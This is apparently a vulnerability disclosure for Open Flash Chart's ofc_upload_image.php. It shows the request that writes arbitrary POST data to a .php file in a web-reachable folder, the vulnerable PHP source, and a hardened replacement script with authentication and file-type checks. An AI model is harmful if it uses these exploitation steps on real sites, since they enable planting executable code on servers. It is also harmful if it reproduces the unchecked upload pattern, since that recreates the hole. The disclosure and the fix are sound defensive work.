Vulnerable file saves POST data under a file name with an arbitrary extension

Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)
POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is in the latest version of wss, and even the paid version has it; this is the demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is simply a tragedy. How to deal with it: add permission checks, extension validation and so on~ do it yourself.
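
The two checks named in the fix above (permission and extension), sketched as a hardened replacement for the raw-POST branch. This is an added example, not code from the original post or from the Open Flash Chart project; the session key `user_id`, the 2 MB limit and the PNG/JPEG allow-list are assumptions.

```php
<?php
// Added example, not the vendor's code: hardened take on ofc_upload_image.php.
// Assumptions: login state lives in $_SESSION['user_id'] (hypothetical key),
// only PNG/JPEG charts are accepted, and the fileinfo and GD extensions are loaded.
declare(strict_types=1);

$uploadDir = __DIR__ . '/../tmp-upload-images/';
$maxBytes  = 2 * 1024 * 1024;                       // constructed limit
$allowed   = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function fail(int $status, string $message): void
{
    http_response_code($status);
    exit($message);
}

// 1. Permission check: anonymous requests never reach the write path.
session_start();
if (empty($_SESSION['user_id'])) {
    fail(403, 'authentication required');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    fail(405, 'POST only');
}

// 2. Read the raw body with a size cap (php://input replaces $HTTP_RAW_POST_DATA).
$body = file_get_contents('php://input', false, null, 0, $maxBytes + 1);
if ($body === false || $body === '' || strlen($body) > $maxBytes) {
    fail(413, 'empty or oversized body');
}

// 3. Type check on the bytes themselves, not on anything the client named.
$mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($body);
$ext  = is_string($mime) ? ($allowed[$mime] ?? null) : null;
if ($ext === null || @imagecreatefromstring($body) === false) {
    fail(415, 'not a PNG or JPEG image');
}

// 4. Server-generated file name; $_GET['name'] is ignored entirely.
if (!is_dir($uploadDir) && !mkdir($uploadDir, 0750, true)) {
    fail(500, 'cannot create upload directory');
}
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if (file_put_contents($uploadDir . $name, $body, LOCK_EX) === false) {
    fail(500, 'cannot write file');
}
echo 'Saved as ' . $name;
```

Independently of the script, the web server should serve tmp-upload-images/ as static files only, so nothing stored there is ever handed to the PHP interpreter.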